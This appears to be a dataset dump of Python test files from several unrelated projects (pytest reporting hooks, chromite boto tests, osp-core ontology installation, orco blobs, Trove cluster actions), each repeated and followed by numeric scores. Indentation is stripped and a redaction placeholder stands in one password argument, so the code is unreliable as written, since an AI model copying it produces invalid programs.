@pytest.hookimpl(tryfirst=True, hookwrapper=True)
def pytest_runtest_makereport(item, call):
"""Add test status for each test in report.json"""
outcome = yield
res = outcome.get_result()
if res.when == "call":
with open("./report.json", "r") as file:
config_id = item.funcargs["configs"]
config_id = config_id[item.originalname]
config_id = config_id["id"]
data = json.load(file)
data[config_id]["passed"] = not res.failed
with open("./report.json", "w") as file:
json.dump(data, file)
# -------------------------------------
# Execute once at session finish
# -------------------------------------
def pytest_sessionfinish(session, exitstatus):
"""Report overall test status in markdown"""
with open("./report.json", "r") as file:
data = json.load(file)
data = [v for _, v in data.items()]
data = sorted(data, key=lambda x: x["id"])
n = [datum["id"].split("/")[-1] for datum in data]
n = max(int(ni) for ni in n)
with open("./report.md", "w") as file:
file.write("Data Check Report\n---\n\n")
for datum in data:
if int(datum["id"].split("/")[-1]) == 0:
file.write(f" Table `{datum['id'][:-2]}` \n\n")
if datum["passed"]:
file.write(f"✔️ {datum['name']} \n\n")
else:
file.write(f"❌ {datum['name']} \n\n")
file.write(f"```sql \n")
file.write(f"{datum['query']}")
file.write(f"``` \n\n")
if int(datum["id"].split("/")[-1]) == n:
file.write("---\n\n")
# -------------------------------------
# Reference
# https://docs.pytest.org/en/6.2.x/contents.html
# ------------------------------------- | 0.453746 | 0.352202 |
from __future__ import print_function
import os
import sys
from six.moves import configparser
from chromite.lib import boto_compat
from chromite.lib import cros_test_lib
from chromite.lib import osutils
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
class FixBotoCertsTest(cros_test_lib.TempDirTestCase):
"""Tests FixBotoCerts functionality."""
def testCaFix(self):
os.environ['BOTO_CONFIG'] = os.path.join(self.tempdir, 'fake')
with boto_compat.FixBotoCerts(strict=True):
boto_config = os.environ['BOTO_CONFIG']
self.assertExists(boto_config)
config = configparser.SafeConfigParser()
config.read(boto_config)
cafile = config.get('Boto', 'ca_certificates_file')
self.assertExists(cafile)
self.assertNotExists(boto_config)
def testMergeBotoConfig(self):
boto_config = os.path.join(self.tempdir, 'boto.cfg')
osutils.WriteFile(boto_config, '[S]\nk = v')
os.environ['BOTO_CONFIG'] = boto_config
with boto_compat.FixBotoCerts(strict=True):
config = configparser.SafeConfigParser()
config.read(os.environ['BOTO_CONFIG'])
self.assertEqual(config.get('S', 'k'), 'v')
self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
self.assertEqual(os.environ['BOTO_CONFIG'], boto_config)
def testMergeBotoPath(self):
cfgfile1 = os.path.join(self.tempdir, 'boto1.cfg')
osutils.WriteFile(cfgfile1, '[S]\nk = v\nk2 = v1')
cfgfile2 = os.path.join(self.tempdir, 'boto2.cfg')
osutils.WriteFile(cfgfile2, '[S]\nk2 = v2')
os.environ['BOTO_PATH'] = boto_path = '%s:%s' % (cfgfile1, cfgfile2)
with boto_compat.FixBotoCerts(strict=True):
config = configparser.SafeConfigParser()
config.read(os.environ['BOTO_CONFIG'])
self.assertEqual(config.get('S', 'k'), 'v')
self.assertEqual(config.get('S', 'k2'), 'v2')
self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
self.assertEqual(os.environ['BOTO_PATH'], boto_path)
def testActivateFalse(self):
os.environ.pop('BOTO_CONFIG', None)
with boto_compat.FixBotoCerts(strict=True, activate=False):
self.assertNotIn('BOTO_CONFIG', os.environ) | lib/boto_compat_unittest.py | from __future__ import print_function
import os
import sys
from six.moves import configparser
from chromite.lib import boto_compat
from chromite.lib import cros_test_lib
from chromite.lib import osutils
assert sys.version_info >= (3, 6), 'This module requires Python 3.6+'
class FixBotoCertsTest(cros_test_lib.TempDirTestCase):
"""Tests FixBotoCerts functionality."""
def testCaFix(self):
os.environ['BOTO_CONFIG'] = os.path.join(self.tempdir, 'fake')
with boto_compat.FixBotoCerts(strict=True):
boto_config = os.environ['BOTO_CONFIG']
self.assertExists(boto_config)
config = configparser.SafeConfigParser()
config.read(boto_config)
cafile = config.get('Boto', 'ca_certificates_file')
self.assertExists(cafile)
self.assertNotExists(boto_config)
def testMergeBotoConfig(self):
boto_config = os.path.join(self.tempdir, 'boto.cfg')
osutils.WriteFile(boto_config, '[S]\nk = v')
os.environ['BOTO_CONFIG'] = boto_config
with boto_compat.FixBotoCerts(strict=True):
config = configparser.SafeConfigParser()
config.read(os.environ['BOTO_CONFIG'])
self.assertEqual(config.get('S', 'k'), 'v')
self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
self.assertEqual(os.environ['BOTO_CONFIG'], boto_config)
def testMergeBotoPath(self):
cfgfile1 = os.path.join(self.tempdir, 'boto1.cfg')
osutils.WriteFile(cfgfile1, '[S]\nk = v\nk2 = v1')
cfgfile2 = os.path.join(self.tempdir, 'boto2.cfg')
osutils.WriteFile(cfgfile2, '[S]\nk2 = v2')
os.environ['BOTO_PATH'] = boto_path = '%s:%s' % (cfgfile1, cfgfile2)
with boto_compat.FixBotoCerts(strict=True):
config = configparser.SafeConfigParser()
config.read(os.environ['BOTO_CONFIG'])
self.assertEqual(config.get('S', 'k'), 'v')
self.assertEqual(config.get('S', 'k2'), 'v2')
self.assertTrue(config.has_option('Boto', 'ca_certificates_file'))
self.assertEqual(os.environ['BOTO_PATH'], boto_path)
def testActivateFalse(self):
os.environ.pop('BOTO_CONFIG', None)
with boto_compat.FixBotoCerts(strict=True, activate=False):
self.assertNotIn('BOTO_CONFIG', os.environ) | 0.400163 | 0.201695 |
import os
import unittest2 as unittest
import tempfile
import rdflib
import shutil
from osp.core.ontology.installation import OntologyInstallationManager, \
pico_migrate
from osp.core.ontology.namespace_registry import NamespaceRegistry
FILES = [
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"parser_test.yml"),
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"..", "osp", "core", "ontology", "docs", "city.ontology.yml"),
]
class TestInstallation(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.TemporaryDirectory()
self.namespace_registry = NamespaceRegistry()
self.namespace_registry._load_cuba()
self.installer = OntologyInstallationManager(
namespace_registry=self.namespace_registry,
path=self.tempdir.name
)
def tearDown(self):
self.tempdir.cleanup()
def copy_files(self):
p1 = os.path.join(self.tempdir.name, os.path.basename(FILES[0]))
p2 = os.path.join(self.tempdir.name, os.path.basename(FILES[1]))
shutil.copyfile(FILES[0], p1)
shutil.copyfile(FILES[1], p2)
return p1, p2
def test_do_install(self):
# clear False
self.installer._install(FILES + ["invalid"], lambda x: x[:-1],
clear=False)
self.assertIn("city", self.namespace_registry._namespaces)
self.assertIn("parser_test", self.namespace_registry._namespaces)
self.assertEqual(self.namespace_registry._namespaces["city"],
rdflib.term.URIRef('http://www.osp-core.com/city#'))
self.assertEqual(
self.namespace_registry._namespaces["parser_test"],
rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt', 'parser_test.xml',
'parser_test.yml']))
with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
lines = set(map(lambda x: x.strip(), f))
self.assertIn("city\thttp://www.osp-core.com/city#", lines)
self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
lines)
g_old = self.namespace_registry._graph
# clear False
self.installer._install([FILES[0]], lambda x: x, clear=True)
self.assertNotIn("city", self.namespace_registry._namespaces)
self.assertIn("parser_test", self.namespace_registry._namespaces)
self.assertIsNot(g_old, self.namespace_registry._graph)
self.assertEqual(
self.namespace_registry._namespaces["parser_test"],
rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
'graph.xml', 'namespaces.txt', 'parser_test.xml',
'parser_test.yml']))
with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
lines = set(map(lambda x: x.strip(), f))
self.assertNotIn("city\thttp://www.osp-core.com/city#", lines)
self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
lines)
def test_get_new_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(self.installer._get_new_packages(FILES), set())
os.remove(o1)
self.assertEqual(self.installer._get_new_packages(FILES), {FILES[0]})
def test_get_replaced_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(
set(self.installer._get_replaced_packages([FILES[0]])),
{FILES[0], o2}
)
self.assertRaises(FileNotFoundError,
self.installer._get_replaced_packages, ["invalid"])
def test_get_remaining_packages(self):
o1, o2 = self.copy_files()
self.assertRaises(
ValueError, self.installer._get_remaining_packages,
["city", "invalid"]
)
self.assertRaises(
ValueError, self.installer._get_remaining_packages, ["city.yml"]
)
self.assertEqual(self.installer._get_remaining_packages(FILES), [])
self.assertEqual(self.installer._get_remaining_packages([FILES[0]]),
[o2])
self.assertEqual(self.installer._get_remaining_packages([o2]),
[o1])
os.remove(o2)
self.assertRaises(ValueError, self.installer._get_remaining_packages,
FILES)
def test_get_installed_packages(self):
o1, o2 = self.copy_files()
open(os.path.join(self.tempdir.name, "o3.xml"), "w").close()
self.assertEqual(self.installer.get_installed_packages(),
{"city", "parser_test"})
self.assertEqual(self.installer.get_installed_packages(True),
{("city", o2), ("parser_test", o1)})
def test_sort_for_installation(self):
r = self.installer._sort_for_installation(
["city", "parser_test"], set())
self.assertEqual(r, ["city", "parser_test"])
r = self.installer._sort_for_installation(
["parser_test", "city"], set())
self.assertEqual(r, ["city", "parser_test"])
self.assertRaises(RuntimeError, self.installer._sort_for_installation,
["parser_test"], set())
def test_pico_migrate(self):
path = os.path.join(self.tempdir.name, ".osp_ontologies")
yml_dir = os.path.join(path, "yml", "installed")
os.makedirs(os.path.join(path, "yml", "installed"))
file = FILES[1]
dest = os.path.join(yml_dir, os.path.basename(file))
shutil.copyfile(file, dest)
pkl_file = os.path.join(path, "foo.bar.pkl")
open(pkl_file, "wb").close()
self.installer.namespace_registry._graph = rdflib.Graph()
pico_migrate(self.installer.namespace_registry,
path)
self.assertEqual(sorted(os.listdir(path)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt']))
if __name__ == "__main__":
unittest.main() | tests/test_installation.py | import os
import unittest2 as unittest
import tempfile
import rdflib
import shutil
from osp.core.ontology.installation import OntologyInstallationManager, \
pico_migrate
from osp.core.ontology.namespace_registry import NamespaceRegistry
FILES = [
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"parser_test.yml"),
os.path.join(os.path.dirname(os.path.abspath(__file__)),
"..", "osp", "core", "ontology", "docs", "city.ontology.yml"),
]
class TestInstallation(unittest.TestCase):
def setUp(self):
self.tempdir = tempfile.TemporaryDirectory()
self.namespace_registry = NamespaceRegistry()
self.namespace_registry._load_cuba()
self.installer = OntologyInstallationManager(
namespace_registry=self.namespace_registry,
path=self.tempdir.name
)
def tearDown(self):
self.tempdir.cleanup()
def copy_files(self):
p1 = os.path.join(self.tempdir.name, os.path.basename(FILES[0]))
p2 = os.path.join(self.tempdir.name, os.path.basename(FILES[1]))
shutil.copyfile(FILES[0], p1)
shutil.copyfile(FILES[1], p2)
return p1, p2
def test_do_install(self):
# clear False
self.installer._install(FILES + ["invalid"], lambda x: x[:-1],
clear=False)
self.assertIn("city", self.namespace_registry._namespaces)
self.assertIn("parser_test", self.namespace_registry._namespaces)
self.assertEqual(self.namespace_registry._namespaces["city"],
rdflib.term.URIRef('http://www.osp-core.com/city#'))
self.assertEqual(
self.namespace_registry._namespaces["parser_test"],
rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt', 'parser_test.xml',
'parser_test.yml']))
with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
lines = set(map(lambda x: x.strip(), f))
self.assertIn("city\thttp://www.osp-core.com/city#", lines)
self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
lines)
g_old = self.namespace_registry._graph
# clear False
self.installer._install([FILES[0]], lambda x: x, clear=True)
self.assertNotIn("city", self.namespace_registry._namespaces)
self.assertIn("parser_test", self.namespace_registry._namespaces)
self.assertIsNot(g_old, self.namespace_registry._graph)
self.assertEqual(
self.namespace_registry._namespaces["parser_test"],
rdflib.term.URIRef('http://www.osp-core.com/parser_test#'))
self.assertEqual(sorted(os.listdir(self.tempdir.name)), sorted([
'graph.xml', 'namespaces.txt', 'parser_test.xml',
'parser_test.yml']))
with open(os.path.join(self.tempdir.name, "namespaces.txt")) as f:
lines = set(map(lambda x: x.strip(), f))
self.assertNotIn("city\thttp://www.osp-core.com/city#", lines)
self.assertIn("cuba\thttp://www.osp-core.com/cuba#", lines)
self.assertIn("parser_test\thttp://www.osp-core.com/parser_test#",
lines)
def test_get_new_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(self.installer._get_new_packages(FILES), set())
os.remove(o1)
self.assertEqual(self.installer._get_new_packages(FILES), {FILES[0]})
def test_get_replaced_packages(self):
o1, o2 = self.copy_files()
self.assertEqual(
set(self.installer._get_replaced_packages([FILES[0]])),
{FILES[0], o2}
)
self.assertRaises(FileNotFoundError,
self.installer._get_replaced_packages, ["invalid"])
def test_get_remaining_packages(self):
o1, o2 = self.copy_files()
self.assertRaises(
ValueError, self.installer._get_remaining_packages,
["city", "invalid"]
)
self.assertRaises(
ValueError, self.installer._get_remaining_packages, ["city.yml"]
)
self.assertEqual(self.installer._get_remaining_packages(FILES), [])
self.assertEqual(self.installer._get_remaining_packages([FILES[0]]),
[o2])
self.assertEqual(self.installer._get_remaining_packages([o2]),
[o1])
os.remove(o2)
self.assertRaises(ValueError, self.installer._get_remaining_packages,
FILES)
def test_get_installed_packages(self):
o1, o2 = self.copy_files()
open(os.path.join(self.tempdir.name, "o3.xml"), "w").close()
self.assertEqual(self.installer.get_installed_packages(),
{"city", "parser_test"})
self.assertEqual(self.installer.get_installed_packages(True),
{("city", o2), ("parser_test", o1)})
def test_sort_for_installation(self):
r = self.installer._sort_for_installation(
["city", "parser_test"], set())
self.assertEqual(r, ["city", "parser_test"])
r = self.installer._sort_for_installation(
["parser_test", "city"], set())
self.assertEqual(r, ["city", "parser_test"])
self.assertRaises(RuntimeError, self.installer._sort_for_installation,
["parser_test"], set())
def test_pico_migrate(self):
path = os.path.join(self.tempdir.name, ".osp_ontologies")
yml_dir = os.path.join(path, "yml", "installed")
os.makedirs(os.path.join(path, "yml", "installed"))
file = FILES[1]
dest = os.path.join(yml_dir, os.path.basename(file))
shutil.copyfile(file, dest)
pkl_file = os.path.join(path, "foo.bar.pkl")
open(pkl_file, "wb").close()
self.installer.namespace_registry._graph = rdflib.Graph()
pico_migrate(self.installer.namespace_registry,
path)
self.assertEqual(sorted(os.listdir(path)), sorted([
'city.yml', 'graph.xml', 'namespaces.txt']))
if __name__ == "__main__":
unittest.main() | 0.378459 | 0.462655 |
import os
import pytest
from orco import builder, attach_object, attach_file, attach_directory, attach_text
def test_blob_validate_name(env):
@builder()
def bb(x):
with pytest.raises(Exception, match="has to be a string"):
attach_object(123, 1)
with pytest.raises(Exception, match="non-empty"):
attach_object("", 2)
with pytest.raises(Exception, match="cannot start with"):
attach_object("!hello", 3)
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value == "Ok"
def test_blob_attach_object(env):
@builder()
def bb(x):
attach_object("object", x * 100)
with pytest.raises(Exception, match="already exists"):
attach_object("object", x * 101)
attach_object("a-object", x)
@builder()
def cc(x):
b = bb(x)
with pytest.raises(Exception, match="not attached"):
b.get_object("xxx")
with pytest.raises(Exception, match="attach_object"):
attach_object("object", None)
yield
assert ["a-object", "object"] == b.get_names()
return b.get_object("object") - 1
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == 1999
b = runtime.compute(bb(x=20))
assert b.value is None
assert b.get_object("object") == 2000
with pytest.raises(Exception, match="xxx"):
b.get_object("xxx")
def test_blob_attach_file(env):
@builder()
def bb(x):
with open("test.png", "wb") as f:
f.write(b"1234")
attach_file("test.png")
attach_file("test.png", name="aaa", mime="application/zzz")
@builder()
def cc(x):
b = bb(x)
yield
b.get_blob_as_file("test.png")
with open("test.png", "rb") as f:
assert f.read() == b"1234"
b.get_blob_as_file("aaa", "ddd")
assert not os.path.isfile("aaa")
with open("ddd", "rb") as f:
assert f.read() == b"1234"
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v, m = a.get_blob("test.png")
assert v == b"1234"
assert m == "image/png"
v, m = a.get_blob("aaa")
assert v == b"1234"
assert m == "application/zzz"
a = runtime.compute(cc(x=20))
assert a.value == "Ok"
def test_blob_attach_text(env):
@builder()
def bb(x):
attach_text("mytext", "Hello world!")
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v = a.get_text("mytext")
assert v == "Hello world!"
def test_blob_attach_directory(env):
@builder()
def bb(x):
os.mkdir("testdir")
os.mkdir("testdir/subdir")
with open("testdir/aa.txt", "w") as f:
f.write("Content 1")
with open("testdir/bb.txt", "w") as f:
f.write("Content 2")
with open("testdir/subdir/cc.txt", "w") as f:
f.write("Content 3")
with open("dd.txt", "w") as f:
f.write("Content 4")
attach_directory("testdir")
attach_directory("testdir", name="testdir2")
@builder()
def cc(x):
a = bb(x)
yield
assert not os.path.isfile("testdir/testdir/aa.txt")
a.extract_tar("testdir2")
assert os.path.isfile("testdir2/aa.txt")
assert os.path.isfile("testdir2/bb.txt")
assert os.path.isfile("testdir2/subdir/cc.txt")
assert not os.path.isfile("aa.txt")
a.extract_tar("testdir", target=".")
assert os.path.isfile("aa.txt")
assert os.path.isfile("bb.txt")
assert os.path.isfile("subdir/cc.txt")
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == "Ok" | tests/test_blobs.py | import os
import pytest
from orco import builder, attach_object, attach_file, attach_directory, attach_text
def test_blob_validate_name(env):
@builder()
def bb(x):
with pytest.raises(Exception, match="has to be a string"):
attach_object(123, 1)
with pytest.raises(Exception, match="non-empty"):
attach_object("", 2)
with pytest.raises(Exception, match="cannot start with"):
attach_object("!hello", 3)
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value == "Ok"
def test_blob_attach_object(env):
@builder()
def bb(x):
attach_object("object", x * 100)
with pytest.raises(Exception, match="already exists"):
attach_object("object", x * 101)
attach_object("a-object", x)
@builder()
def cc(x):
b = bb(x)
with pytest.raises(Exception, match="not attached"):
b.get_object("xxx")
with pytest.raises(Exception, match="attach_object"):
attach_object("object", None)
yield
assert ["a-object", "object"] == b.get_names()
return b.get_object("object") - 1
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == 1999
b = runtime.compute(bb(x=20))
assert b.value is None
assert b.get_object("object") == 2000
with pytest.raises(Exception, match="xxx"):
b.get_object("xxx")
def test_blob_attach_file(env):
@builder()
def bb(x):
with open("test.png", "wb") as f:
f.write(b"1234")
attach_file("test.png")
attach_file("test.png", name="aaa", mime="application/zzz")
@builder()
def cc(x):
b = bb(x)
yield
b.get_blob_as_file("test.png")
with open("test.png", "rb") as f:
assert f.read() == b"1234"
b.get_blob_as_file("aaa", "ddd")
assert not os.path.isfile("aaa")
with open("ddd", "rb") as f:
assert f.read() == b"1234"
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v, m = a.get_blob("test.png")
assert v == b"1234"
assert m == "image/png"
v, m = a.get_blob("aaa")
assert v == b"1234"
assert m == "application/zzz"
a = runtime.compute(cc(x=20))
assert a.value == "Ok"
def test_blob_attach_text(env):
@builder()
def bb(x):
attach_text("mytext", "Hello world!")
runtime = env.test_runtime()
a = runtime.compute(bb(x=20))
assert a.value is None
v = a.get_text("mytext")
assert v == "Hello world!"
def test_blob_attach_directory(env):
@builder()
def bb(x):
os.mkdir("testdir")
os.mkdir("testdir/subdir")
with open("testdir/aa.txt", "w") as f:
f.write("Content 1")
with open("testdir/bb.txt", "w") as f:
f.write("Content 2")
with open("testdir/subdir/cc.txt", "w") as f:
f.write("Content 3")
with open("dd.txt", "w") as f:
f.write("Content 4")
attach_directory("testdir")
attach_directory("testdir", name="testdir2")
@builder()
def cc(x):
a = bb(x)
yield
assert not os.path.isfile("testdir/testdir/aa.txt")
a.extract_tar("testdir2")
assert os.path.isfile("testdir2/aa.txt")
assert os.path.isfile("testdir2/bb.txt")
assert os.path.isfile("testdir2/subdir/cc.txt")
assert not os.path.isfile("aa.txt")
a.extract_tar("testdir", target=".")
assert os.path.isfile("aa.txt")
assert os.path.isfile("bb.txt")
assert os.path.isfile("subdir/cc.txt")
return "Ok"
runtime = env.test_runtime()
a = runtime.compute(cc(x=20))
assert a.value == "Ok" | 0.57821 | 0.581897 |
import os
from proboscis import SkipTest
import six
import time as timer
from trove.common import cfg
from trove.common import exception
from trove.common.utils import poll_until
from trove.tests.scenario.helpers.test_helper import DataType
from trove.tests.scenario.runners.test_runners import TestRunner
from trove.tests.util.check import TypeCheck
from troveclient.compat import exceptions
CONF = cfg.CONF
class ClusterActionsRunner(TestRunner):
USE_CLUSTER_ID_FLAG = 'TESTS_USE_CLUSTER_ID'
DO_NOT_DELETE_CLUSTER_FLAG = 'TESTS_DO_NOT_DELETE_CLUSTER'
EXTRA_INSTANCE_NAME = "named_instance"
def __init__(self):
super(ClusterActionsRunner, self).__init__()
self.cluster_name = 'test_cluster'
self.cluster_id = 0
self.cluster_inst_ids = None
self.cluster_count_before_create = None
self.srv_grp_id = None
self.current_root_creds = None
self.locality = 'affinity'
@property
def is_using_existing_cluster(self):
return self.has_env_flag(self.USE_CLUSTER_ID_FLAG)
@property
def has_do_not_delete_cluster(self):
return self.has_env_flag(self.DO_NOT_DELETE_CLUSTER_FLAG)
@property
def min_cluster_node_count(self):
return 2
def run_cluster_create(self, num_nodes=None, expected_task_name='BUILDING',
expected_instance_states=['BUILD', 'ACTIVE'],
expected_http_code=200):
self.cluster_count_before_create = len(
self.auth_client.clusters.list())
if not num_nodes:
num_nodes = self.min_cluster_node_count
instance_flavor = self.get_instance_flavor()
instances_def = [
self.build_flavor(
flavor_id=self.get_flavor_href(instance_flavor),
volume_size=self.instance_info.volume['size'])] * num_nodes
self.cluster_id = self.assert_cluster_create(
self.cluster_name, instances_def, self.locality,
expected_task_name, expected_instance_states, expected_http_code)
def assert_cluster_create(
self, cluster_name, instances_def, locality, expected_task_name,
expected_instance_states, expected_http_code):
self.report.log("Testing cluster create: %s" % cluster_name)
cluster = self.get_existing_cluster()
if cluster:
self.report.log("Using an existing cluster: %s" % cluster.id)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states[-1:])
else:
cluster = self.auth_client.clusters.create(
cluster_name, self.instance_info.dbaas_datastore,
self.instance_info.dbaas_datastore_version,
instances=instances_def, locality=locality)
self._assert_cluster_values(cluster, expected_task_name)
# Don't give an expected task here or it will do a 'get' on
# the cluster. We tested the cluster values above.
self._assert_cluster_action(cluster.id, None,
expected_http_code)
cluster_instances = self._get_cluster_instances(cluster.id)
self.assert_all_instance_states(
cluster_instances, expected_instance_states)
# Create the helper user/database on the first node.
# The cluster should handle the replication itself.
self.create_test_helper_on_instance(cluster_instances[0])
# make sure the server_group was created
self.cluster_inst_ids = [inst.id for inst in cluster_instances]
for id in self.cluster_inst_ids:
srv_grp_id = self.assert_server_group_exists(id)
if self.srv_grp_id and self.srv_grp_id != srv_grp_id:
self.fail("Found multiple server groups for cluster")
self.srv_grp_id = srv_grp_id
cluster_id = cluster.id
# Although all instances have already acquired the expected state,
# we still need to poll for the final cluster task, because
# it may take up to the periodic task interval until the task name
# gets updated in the Trove database.
self._assert_cluster_states(cluster_id, ['NONE'])
return cluster_id
def get_existing_cluster(self):
if self.is_using_existing_cluster:
cluster_id = os.environ.get(self.USE_CLUSTER_ID_FLAG)
return self.auth_client.clusters.get(cluster_id)
def run_cluster_list(self, expected_http_code=200):
self.assert_cluster_list(
self.cluster_count_before_create + 1,
expected_http_code)
def assert_cluster_list(self, expected_count,
expected_http_code):
count = len(self.auth_client.clusters.list())
self.assert_client_code(expected_http_code)
self.assert_equal(expected_count, count, "Unexpected cluster count")
def run_cluster_show(self, expected_http_code=200,
expected_task_name='NONE'):
self.assert_cluster_show(
self.cluster_id, expected_task_name, expected_http_code)
def assert_cluster_show(self, cluster_id, expected_task_name,
expected_http_code):
self._assert_cluster_response(cluster_id, expected_task_name)
def run_cluster_root_enable(self, expected_task_name=None,
expected_http_code=200):
root_credentials = self.test_helper.get_helper_credentials_root()
self.current_root_creds = self.auth_client.root.create_cluster_root(
self.cluster_id, root_credentials['password'])
self.assert_equal(root_credentials['name'],
self.current_root_creds[0])
self.assert_equal(root_credentials['password'],
self.current_root_creds[1])
self._assert_cluster_action(self.cluster_id, expected_task_name,
expected_http_code)
def run_verify_cluster_root_enable(self):
if not self.current_root_creds:
raise SkipTest("Root not enabled.")
cluster = self.auth_client.clusters.get(self.cluster_id)
for instance in cluster.instances:
root_enabled_test = self.auth_client.root.is_instance_root_enabled(
instance['id'])
self.assert_true(root_enabled_test.rootEnabled)
ping_response = self.test_helper.ping(
cluster.ip[0],
username=self.current_root_creds[0],
password=<PASSWORD>[1]
)
self.assert_true(ping_response)
def run_add_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_add_cluster_data(data_type, self.cluster_id)
def run_add_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_add_cluster_data(data_type, self.cluster_id)
def assert_add_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.add_data(data_type, cluster.ip[0])
def run_verify_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def run_verify_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_verify_cluster_data(data_type, self.cluster_id)
def assert_verify_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.verify_data(data_type, cluster.ip[0])
def run_remove_initial_cluster_data(self, data_type=DataType.tiny):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def run_remove_extra_cluster_data(self, data_type=DataType.tiny2):
self.assert_remove_cluster_data(data_type, self.cluster_id)
def assert_remove_cluster_data(self, data_type, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
self.test_helper.remove_data(data_type, cluster.ip[0])
def run_cluster_grow(self, expected_task_name='GROWING_CLUSTER',
expected_http_code=202):
# Add two instances. One with an explicit name.
added_instance_defs = [
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size']),
self._build_instance_def(self.instance_info.dbaas_flavor_href,
self.instance_info.volume['size'],
self.EXTRA_INSTANCE_NAME)]
self.assert_cluster_grow(
self.cluster_id, added_instance_defs, expected_task_name,
expected_http_code)
def _build_instance_def(self, flavor_id, volume_size, name=None):
instance_def = self.build_flavor(
flavor_id=flavor_id, volume_size=volume_size)
if name:
instance_def.update({'name': name})
return instance_def
def assert_cluster_grow(self, cluster_id, added_instance_defs,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
cluster = self.auth_client.clusters.grow(cluster_id,
added_instance_defs)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_equal(len(added_instance_defs),
len(cluster.instances) - initial_instance_count,
"Unexpected number of added nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_states(cluster_id, ['NONE'])
self._assert_cluster_response(cluster_id, 'NONE')
def run_cluster_shrink(
self, expected_task_name=None, expected_http_code=202):
self.assert_cluster_shrink(self.cluster_id, [self.EXTRA_INSTANCE_NAME],
expected_task_name, expected_http_code)
def assert_cluster_shrink(self, cluster_id, removed_instance_names,
expected_task_name, expected_http_code):
cluster = self.auth_client.clusters.get(cluster_id)
initial_instance_count = len(cluster.instances)
removed_instances = self._find_cluster_instances_by_name(
cluster, removed_instance_names)
cluster = self.auth_client.clusters.shrink(
cluster_id, [{'id': instance['id']}
for instance in removed_instances])
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self._assert_cluster_states(cluster_id, ['NONE'])
cluster = self.auth_client.clusters.get(cluster_id)
self.assert_equal(
len(removed_instance_names),
initial_instance_count - len(cluster.instances),
"Unexpected number of removed nodes.")
cluster_instances = self._get_cluster_instances(cluster_id)
self.assert_all_instance_states(cluster_instances, ['ACTIVE'])
self._assert_cluster_response(cluster_id, 'NONE')
def _find_cluster_instances_by_name(self, cluster, instance_names):
return [instance for instance in cluster.instances
if instance['name'] in instance_names]
def run_cluster_delete(
self, expected_task_name='DELETING',
expected_last_instance_state='SHUTDOWN', expected_http_code=202):
if self.has_do_not_delete_cluster:
self.report.log("TESTS_DO_NOT_DELETE_CLUSTER=True was "
"specified, skipping delete...")
raise SkipTest("TESTS_DO_NOT_DELETE_CLUSTER was specified.")
self.assert_cluster_delete(
self.cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code)
def assert_cluster_delete(
self, cluster_id, expected_task_name, expected_last_instance_state,
expected_http_code):
self.report.log("Testing cluster delete: %s" % cluster_id)
cluster_instances = self._get_cluster_instances(cluster_id)
self.auth_client.clusters.delete(cluster_id)
self._assert_cluster_action(cluster_id, expected_task_name,
expected_http_code, check_locality=False)
self.assert_all_gone(cluster_instances, expected_last_instance_state)
self._assert_cluster_gone(cluster_id)
# make sure the server group is gone too
self.assert_server_group_gone(self.srv_grp_id)
def _get_cluster_instances(self, cluster_id):
cluster = self.auth_client.clusters.get(cluster_id)
return [self.auth_client.instances.get(instance['id'])
